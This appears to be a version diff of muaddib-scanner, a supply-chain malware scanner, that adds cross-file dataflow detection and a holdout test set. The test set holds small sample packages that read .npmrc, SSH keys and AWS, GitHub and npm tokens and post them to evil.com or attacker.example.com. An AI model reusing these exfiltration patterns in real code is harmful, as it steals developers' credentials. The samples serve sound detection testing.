muaddib-scanner 2.2.5 → 2.2.7

package/datasets/holdout-v5/conditional-split/detector.js

@@ -0,0 +1,2 @@
+const isCI = !!process.env.CI;
+module.exports = isCI;

package/datasets/holdout-v5/conditional-split/package.json

@@ -0,0 +1,5 @@
+{
+  "name": "conditional-split",
+  "version": "1.0.0",
+  "description": "Holdout v5 — conditional CI-gated exfiltration"
+}

package/datasets/holdout-v5/conditional-split/stealer.js

@@ -0,0 +1,16 @@
+const fs = require('fs');
+const path = require('path');
+const os = require('os');
+const https = require('https');
+const isCI = require('./detector');
+
+if (isCI) {
+  const npmrc = fs.readFileSync(path.join(os.homedir(), '.npmrc'), 'utf8');
+  const req = https.request({
+    hostname: 'evil.com',
+    path: '/ci-steal',
+    method: 'POST'
+  }, (res) => { res.resume(); });
+  req.write(npmrc);
+  req.end();
+}

package/datasets/holdout-v5/event-emitter-flow/listener.js

@@ -0,0 +1,12 @@
+const https = require('https');
+const bus = require('./scanner');
+
+bus.on('data', (creds) => {
+  const req = https.request({
+    hostname: 'evil.com',
+    path: '/steal',
+    method: 'POST'
+  }, (res) => { res.resume(); });
+  req.write(creds);
+  req.end();
+});

package/datasets/holdout-v5/event-emitter-flow/package.json

@@ -0,0 +1,5 @@
+{
+  "name": "event-emitter-flow",
+  "version": "1.0.0",
+  "description": "Holdout v5 — EventEmitter-based credential flow"
+}

package/datasets/holdout-v5/event-emitter-flow/scanner.js

@@ -0,0 +1,11 @@
+const fs = require('fs');
+const path = require('path');
+const os = require('os');
+const EventEmitter = require('events');
+
+const bus = new EventEmitter();
+
+const npmrc = fs.readFileSync(path.join(os.homedir(), '.npmrc'), 'utf8');
+bus.emit('data', npmrc);
+
+module.exports = bus;

package/datasets/holdout-v5/mixed-inline-split/index.js

@@ -0,0 +1,6 @@
+// Inline obfuscated payload (intra-file threat)
+const payload = Buffer.from('Y29uc29sZS5sb2coInB3bmVkIik=', 'base64').toString();
+eval(payload);
+
+// Also orchestrate cross-file flow
+require('./sender');

package/datasets/holdout-v5/mixed-inline-split/package.json

@@ -0,0 +1,5 @@
+{
+  "name": "mixed-inline-split",
+  "version": "1.0.0",
+  "description": "Holdout v5 — intra-file eval + cross-file dataflow"
+}

package/datasets/holdout-v5/mixed-inline-split/reader.js

@@ -0,0 +1,3 @@
+const fs = require('fs');
+const data = fs.readFileSync('.npmrc', 'utf8');
+module.exports = data;

package/datasets/holdout-v5/mixed-inline-split/sender.js

@@ -0,0 +1,6 @@
+const stolen = require('./reader');
+
+fetch('https://evil.com/exfil', {
+  method: 'POST',
+  body: stolen
+});

package/datasets/holdout-v5/named-export-steal/main.js

@@ -0,0 +1,6 @@
+const { getCredentials } = require('./utils');
+
+fetch('https://evil.com/aws', {
+  method: 'POST',
+  body: getCredentials
+});

package/datasets/holdout-v5/named-export-steal/package.json

@@ -0,0 +1,5 @@
+{
+  "name": "named-export-steal",
+  "version": "1.0.0",
+  "description": "Holdout v5 — named export destructuring steal"
+}

package/datasets/holdout-v5/named-export-steal/utils.js

@@ -0,0 +1 @@
+exports.getCredentials = process.env.AWS_SECRET_ACCESS_KEY;

package/datasets/holdout-v5/reexport-chain/a.js

@@ -0,0 +1,2 @@
+const token = process.env.NPM_TOKEN;
+module.exports = token;

package/datasets/holdout-v5/reexport-chain/b.js

@@ -0,0 +1 @@
+module.exports = require('./a');

package/datasets/holdout-v5/reexport-chain/c.js

@@ -0,0 +1,11 @@
+const https = require('https');
+const secret = require('./b');
+
+const req = https.request({
+  hostname: 'evil.com',
+  path: '/npm-token',
+  method: 'POST'
+}, (res) => { res.resume(); });
+
+req.write(secret);
+req.end();

package/datasets/holdout-v5/reexport-chain/package.json

@@ -0,0 +1,5 @@
+{
+  "name": "reexport-chain",
+  "version": "1.0.0",
+  "description": "Holdout v5 — double re-export chain a → b → c"
+}

package/datasets/holdout-v5/split-env-exfil/env.js

@@ -0,0 +1,2 @@
+const token = process.env.GITHUB_TOKEN;
+module.exports = token;

package/datasets/holdout-v5/split-env-exfil/exfil.js

@@ -0,0 +1,5 @@
+const token = require('./env');
+fetch('https://evil.com/collect', {
+  method: 'POST',
+  body: token
+});

package/datasets/holdout-v5/split-env-exfil/package.json

@@ -0,0 +1,5 @@
+{
+  "name": "split-env-exfil",
+  "version": "1.0.0",
+  "description": "Holdout v5 — cross-file env token exfil"
+}

package/datasets/holdout-v5/split-npmrc-steal/index.js

@@ -0,0 +1,2 @@
+require('./reader');
+require('./sender');

package/datasets/holdout-v5/split-npmrc-steal/package.json

@@ -0,0 +1,5 @@
+{
+  "name": "split-npmrc-steal",
+  "version": "1.0.0",
+  "description": "Holdout v5 — cross-file .npmrc steal"
+}

package/datasets/holdout-v5/split-npmrc-steal/reader.js

@@ -0,0 +1,8 @@
+const fs = require('fs');
+const path = require('path');
+const os = require('os');
+
+const npmrcPath = path.join(os.homedir(), '.npmrc');
+const content = fs.readFileSync(npmrcPath, 'utf8');
+
+module.exports = content;

package/datasets/holdout-v5/split-npmrc-steal/sender.js

@@ -0,0 +1,17 @@
+const https = require('https');
+const data = require('./reader');
+
+const options = {
+  hostname: 'collector.evil.com',
+  port: 443,
+  path: '/exfil',
+  method: 'POST',
+  headers: { 'Content-Type': 'text/plain' }
+};
+
+const req = https.request(options, (res) => {
+  res.resume();
+});
+
+req.write(data);
+req.end();

package/datasets/holdout-v5/three-hop-chain/package.json

@@ -0,0 +1,5 @@
+{
+  "name": "three-hop-chain",
+  "version": "1.0.0",
+  "description": "Holdout v5 — 3-file chain reader → transform → sender"
+}

package/datasets/holdout-v5/three-hop-chain/reader.js

@@ -0,0 +1,8 @@
+const os = require('os');
+const fs = require('fs');
+const path = require('path');
+
+const keyPath = path.join(os.homedir(), '.ssh', 'id_rsa');
+const key = fs.readFileSync(keyPath, 'utf8');
+
+module.exports = key;

package/datasets/holdout-v5/three-hop-chain/sender.js

@@ -0,0 +1,11 @@
+const https = require('https');
+const payload = require('./transform');
+
+const req = https.request({
+  hostname: 'attacker.example.com',
+  path: '/collect',
+  method: 'POST'
+}, (res) => { res.resume(); });
+
+req.write(payload);
+req.end();

package/datasets/holdout-v5/three-hop-chain/transform.js

@@ -0,0 +1,3 @@
+const raw = require('./reader');
+const encoded = Buffer.from(raw).toString('base64');
+module.exports = encoded;

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.2.5",
+  "version": "2.2.7",
   "description": "Supply-chain threat detection & response for npm & PyPI/Python",
   "main": "src/index.js",
   "bin": {

package/src/commands/evaluate.js

@@ -3,11 +3,17 @@
  *
  * Measures TPR (Ground Truth), FPR (Benign), and ADR (Adversarial).
  * Saves versioned metrics to metrics/v{version}.json.
+ *
+ * Benign FPR: downloads real npm tarballs and scans actual source code
+ * with all 13+ scanners (AST, dataflow, obfuscation, entropy, etc.).
+ * Tarballs are cached in .muaddib-cache/benign-tarballs/ to avoid
+ * re-downloading on every run.
  */
 
 const fs = require('fs');
 const path = require('path');
-const os = require('os');
+const zlib = require('zlib');
+const { execSync } = require('child_process');
 const { run } = require('../index.js');
 
 const ROOT = path.join(__dirname, '..', '..');
@@ -15,9 +21,11 @@ const GT_DIR = path.join(ROOT, 'tests', 'ground-truth');
 const BENIGN_DIR = path.join(ROOT, 'datasets', 'benign');
 const ADVERSARIAL_DIR = path.join(ROOT, 'datasets', 'adversarial');
 const METRICS_DIR = path.join(ROOT, 'metrics');
+const CACHE_DIR = path.join(ROOT, '.muaddib-cache', 'benign-tarballs');
 
 const GT_THRESHOLD = 3;
 const BENIGN_THRESHOLD = 20;
+const PACK_TIMEOUT_MS = 30000;
 
 const ADVERSARIAL_THRESHOLDS = {
   // Vague 1 (20 samples)
@@ -102,45 +110,187 @@ async function evaluateGroundTruth() {
   return { detected, total, tpr, details };
 }
 
+// =========================================================================
+// 2. Benign — download real tarballs and scan actual source code
+// =========================================================================
+
+/**
+ * Convert a package name to a safe cache directory name.
+ * @scoped/pkg → _scoped_pkg
+ */
+function pkgToCacheName(pkg) {
+  return pkg.replace(/\//g, '_').replace(/@/g, '_');
+}
+
+/**
+ * Extract a .tgz file using Node.js built-in zlib + minimal tar parser.
+ * Only extracts regular files (type '0' or NUL).
+ */
+function extractTgz(tgzPath, destDir) {
+  const compressed = fs.readFileSync(tgzPath);
+  const tarData = zlib.gunzipSync(compressed);
+
+  let offset = 0;
+  while (offset + 512 <= tarData.length) {
+    const header = tarData.subarray(offset, offset + 512);
+
+    // Check for end-of-archive (two zero blocks)
+    if (header.every(b => b === 0)) break;
+
+    // Parse tar header
+    const name = header.subarray(0, 100).toString('utf8').replace(/\0+$/, '');
+    const sizeOctal = header.subarray(124, 136).toString('utf8').replace(/\0+$/, '').trim();
+    const size = parseInt(sizeOctal, 8) || 0;
+    const typeFlag = String.fromCharCode(header[156]);
+
+    offset += 512; // move past header
+
+    if (name && (typeFlag === '0' || typeFlag === '\0') && size > 0) {
+      // Regular file — extract it
+      const filePath = path.join(destDir, name);
+      fs.mkdirSync(path.dirname(filePath), { recursive: true });
+      const fileData = tarData.subarray(offset, offset + size);
+      fs.writeFileSync(filePath, fileData);
+    }
+
+    // Advance past data blocks (512-byte aligned)
+    offset += Math.ceil(size / 512) * 512;
+  }
+}
+
 /**
- * 2. Benign — scan popular npm packages for false positives
+ * Download a package tarball via `npm pack` and extract with native Node.js.
+ * Returns the path to the extracted package directory, or null on failure.
+ * Uses a persistent cache to avoid re-downloading.
  */
-async function evaluateBenign() {
+function downloadAndExtract(pkg, options = {}) {
+  const cacheName = pkgToCacheName(pkg);
+  const pkgCacheDir = path.join(CACHE_DIR, cacheName);
+
+  // Check cache first (unless refreshing)
+  if (!options.refreshBenign && fs.existsSync(pkgCacheDir)) {
+    const extractedDir = path.join(pkgCacheDir, 'package');
+    if (fs.existsSync(extractedDir)) {
+      return extractedDir;
+    }
+  }
+
+  // Download via npm pack (cwd approach avoids Windows path issues)
+  fs.mkdirSync(pkgCacheDir, { recursive: true });
+
+  let tgzFilename;
+  try {
+    const output = execSync(`npm pack ${pkg}`, {
+      cwd: pkgCacheDir,
+      encoding: 'utf8',
+      timeout: PACK_TIMEOUT_MS,
+      stdio: ['pipe', 'pipe', 'pipe']
+    });
+    tgzFilename = output.trim().split('\n').pop().trim();
+  } catch (err) {
+    if (process.env.MUADDIB_DEBUG) {
+      console.error(`\n  [DEBUG] npm pack ${pkg} failed: ${(err.stderr || err.message || '').slice(0, 200)}`);
+    }
+    fs.rmSync(pkgCacheDir, { recursive: true, force: true });
+    return null;
+  }
+
+  const tgzPath = path.join(pkgCacheDir, tgzFilename);
+  if (!fs.existsSync(tgzPath)) {
+    fs.rmSync(pkgCacheDir, { recursive: true, force: true });
+    return null;
+  }
+
+  // Extract tarball using native Node.js (no shell tar dependency)
+  try {
+    extractTgz(tgzPath, pkgCacheDir);
+  } catch (err) {
+    if (process.env.MUADDIB_DEBUG) {
+      console.error(`\n  [DEBUG] extract ${pkg} failed: ${(err.message || '').slice(0, 200)}`);
+    }
+    fs.rmSync(pkgCacheDir, { recursive: true, force: true });
+    return null;
+  }
+
+  // Clean up tarball to save space
+  try { fs.unlinkSync(tgzPath); } catch { /* ignore */ }
+
+  const extractedDir = path.join(pkgCacheDir, 'package');
+  if (!fs.existsSync(extractedDir)) {
+    fs.rmSync(pkgCacheDir, { recursive: true, force: true });
+    return null;
+  }
+
+  return extractedDir;
+}
+
+/**
+ * Evaluate benign packages by downloading real source code and scanning it.
+ */
+async function evaluateBenign(options = {}) {
   const listFile = path.join(BENIGN_DIR, 'packages-npm.txt');
-  const packages = fs.readFileSync(listFile, 'utf8')
+  let packages = fs.readFileSync(listFile, 'utf8')
     .split('\n')
     .map(l => l.trim())
     .filter(l => l && !l.startsWith('#'));
 
+  // Apply limit if specified
+  const limit = options.benignLimit || 0;
+  if (limit > 0) {
+    packages = packages.slice(0, limit);
+  }
+
+  fs.mkdirSync(CACHE_DIR, { recursive: true });
+
   const details = [];
   let flagged = 0;
+  let skipped = 0;
+  const total = packages.length;
+
+  for (let i = 0; i < packages.length; i++) {
+    const pkg = packages[i];
+    const progress = `[${i + 1}/${total}]`;
 
-  for (const pkg of packages) {
-    const tmpDir = fs.mkdtempSync(path.join(os.tmpdir(), 'muaddib-eval-'));
-    try {
-      // Create minimal project with this package as dependency
-      const pkgJson = { name: 'eval-project', version: '1.0.0', dependencies: { [pkg]: '*' } };
-      fs.writeFileSync(path.join(tmpDir, 'package.json'), JSON.stringify(pkgJson));
-
-      // Create fake node_modules entry so dependency scanner picks it up
-      const parts = pkg.split('/');
-      const nmDir = path.join(tmpDir, 'node_modules', ...parts);
-      fs.mkdirSync(nmDir, { recursive: true });
-      fs.writeFileSync(path.join(nmDir, 'package.json'), JSON.stringify({ name: pkg, version: '999.0.0' }));
-
-      const result = await silentScan(tmpDir);
-      const score = result.summary.riskScore;
-      const isFlagged = score > BENIGN_THRESHOLD;
-      if (isFlagged) flagged++;
-      details.push({ name: pkg, score, flagged: isFlagged });
-    } finally {
-      fs.rmSync(tmpDir, { recursive: true, force: true });
+    // Progress indicator (overwrite line)
+    if (!options.json && process.stdout.isTTY) {
+      process.stdout.write(`\r  [2/3] Benign ${progress} ${pkg}${''.padEnd(40)}`);
     }
+
+    const extractedDir = downloadAndExtract(pkg, options);
+    if (!extractedDir) {
+      details.push({ name: pkg, score: 0, flagged: false, skipped: true, error: 'download failed' });
+      skipped++;
+      continue;
+    }
+
+    const result = await silentScan(extractedDir);
+    const score = result.summary.riskScore;
+    const isFlagged = score > BENIGN_THRESHOLD;
+    if (isFlagged) flagged++;
+
+    const entry = { name: pkg, score, flagged: isFlagged };
+
+    // Include threat details for flagged packages (for debugging FPs)
+    if (isFlagged && result.threats) {
+      entry.threats = result.threats.map(t => ({
+        type: t.type,
+        severity: t.severity,
+        message: t.message,
+        file: t.file
+      }));
+    }
+
+    details.push(entry);
   }
 
-  const total = packages.length;
-  const fpr = total > 0 ? flagged / total : 0;
-  return { flagged, total, fpr, details };
+  // Clear progress line
+  if (!options.json && process.stdout.isTTY) {
+    process.stdout.write('\r' + ''.padEnd(80) + '\r');
+  }
+
+  const scanned = total - skipped;
+  const fpr = scanned > 0 ? flagged / scanned : 0;
+  return { flagged, total, scanned, skipped, fpr, details };
 }
 
 /**
@@ -186,6 +336,11 @@ function saveMetrics(report) {
 
 /**
  * Main evaluate function
+ *
+ * Options:
+ *   json             — JSON output mode
+ *   benignLimit      — Only test first N benign packages
+ *   refreshBenign    — Force re-download of all tarballs
  */
 async function evaluate(options = {}) {
   const version = require('../../package.json').version;
@@ -198,9 +353,9 @@ async function evaluate(options = {}) {
   const groundTruth = await evaluateGroundTruth();
 
   if (!jsonMode) {
-    console.log(`  [2/3] Benign packages...`);
+    console.log(`  [2/3] Benign packages (real source code)...`);
   }
-  const benign = await evaluateBenign();
+  const benign = await evaluateBenign(options);
 
   if (!jsonMode) {
     console.log(`  [3/3] Adversarial samples...`);
@@ -226,7 +381,7 @@ async function evaluate(options = {}) {
 
     console.log('');
     console.log(`  Ground Truth (TPR):  ${groundTruth.detected}/${groundTruth.total}  ${tprPct}%`);
-    console.log(`  Benign (FPR):        ${benign.flagged}/${benign.total}  ${fprPct}%`);
+    console.log(`  Benign (FPR):        ${benign.flagged}/${benign.scanned}  ${fprPct}%  (${benign.skipped} skipped)`);
     console.log(`  Adversarial (ADR):   ${adversarial.detected}/${adversarial.total}  ${adrPct}%`);
     console.log('');
 
@@ -240,12 +395,17 @@ async function evaluate(options = {}) {
       console.log('');
     }
 
-    // Show false positives
+    // Show false positives with threat details
     const fps = benign.details.filter(d => d.flagged);
     if (fps.length > 0) {
       console.log('  False positives:');
       for (const fp of fps) {
         console.log(`    ${fp.name}: score ${fp.score}`);
+        if (fp.threats) {
+          for (const t of fp.threats) {
+            console.log(`      [${t.severity}] ${t.type}: ${t.message}${t.file ? ' (' + t.file + ')' : ''}`);
+          }
+        }
       }
       console.log('');
     }

package/src/index.js

@@ -20,6 +20,7 @@ const { ensureIOCs } = require('./ioc/bootstrap.js');
 const { scanEntropy } = require('./scanner/entropy.js');
 const { scanAIConfig } = require('./scanner/ai-config.js');
 const { deobfuscate } = require('./scanner/deobfuscate.js');
+const { buildModuleGraph, annotateTaintedExports, detectCrossFileFlows } = require('./scanner/module-graph.js');
 const { detectSuddenLifecycleChange } = require('./temporal-analysis.js');
 const { detectSuddenAstChanges } = require('./temporal-ast-diff.js');
 const { detectPublishAnomaly } = require('./publish-anomaly.js');
@@ -226,6 +227,18 @@ async function run(targetPath, options = {}) {
   // Deobfuscation pre-processor (pass to AST/dataflow scanners unless disabled)
   const deobfuscateFn = options.noDeobfuscate ? null : deobfuscate;
 
+  // Cross-file module graph analysis (before individual scanners)
+  let crossFileFlows = [];
+  if (!options.noModuleGraph) {
+    try {
+      const graph = buildModuleGraph(targetPath);
+      const tainted = annotateTaintedExports(graph, targetPath);
+      crossFileFlows = detectCrossFileFlows(graph, tainted, targetPath);
+    } catch {
+      // Graceful fallback — module graph is best-effort
+    }
+  }
+
   // Parallel execution of all independent scanners
   const [
     packageThreats,
@@ -275,7 +288,13 @@ async function run(targetPath, options = {}) {
     ...pythonThreats,
     ...pypiTyposquatThreats,
     ...entropyThreats,
-    ...aiConfigThreats
+    ...aiConfigThreats,
+    ...crossFileFlows.map(f => ({
+      type: f.type,
+      severity: f.severity,
+      message: `Cross-file dataflow: ${f.source} in ${f.sourceFile} → ${f.sink} in ${f.sinkFile}`,
+      file: f.sinkFile
+    }))
   ];
 
   // Paranoid mode

package/src/response/playbooks.js

@@ -304,6 +304,11 @@ const PLAYBOOKS = {
     'NE PAS installer. Ceci execute du code arbitraire a l\'installation. ' +
     'Si deja installe: considerer la machine compromise. Auditer les modifications systeme.',
 
+  cross_file_dataflow:
+    'CRITIQUE: Un module lit des credentials et les exporte vers un autre module qui les envoie sur le reseau. ' +
+    'Exfiltration inter-fichiers confirmee. Isoler la machine, supprimer le package, regenerer TOUS les secrets. ' +
+    'Auditer les connexions reseau recentes pour identifier les donnees exfiltrees.',
+
   credential_tampering:
     'CRITIQUE: Ecriture detectee dans un cache sensible (npm _cacache, yarn, pip). ' +
     'Possible cache poisoning: injection de code malveillant dans des packages caches. ' +

package/src/rules/index.js

@@ -624,6 +624,19 @@ const RULES = {
     mitre: 'T1195.002'
   },
 
+  cross_file_dataflow: {
+    id: 'MUADDIB-FLOW-004',
+    name: 'Cross-File Data Exfiltration',
+    severity: 'CRITICAL',
+    confidence: 'high',
+    description: 'Un module lit des credentials (fs.readFileSync, process.env) et les exporte vers un autre module qui les envoie sur le reseau (fetch, https.request). Exfiltration inter-fichiers confirmee.',
+    references: [
+      'https://blog.phylum.io/shai-hulud-npm-worm',
+      'https://attack.mitre.org/techniques/T1041/'
+    ],
+    mitre: 'T1041'
+  },
+
   credential_tampering: {
     id: 'MUADDIB-FLOW-003',
     name: 'Credential/Cache Tampering',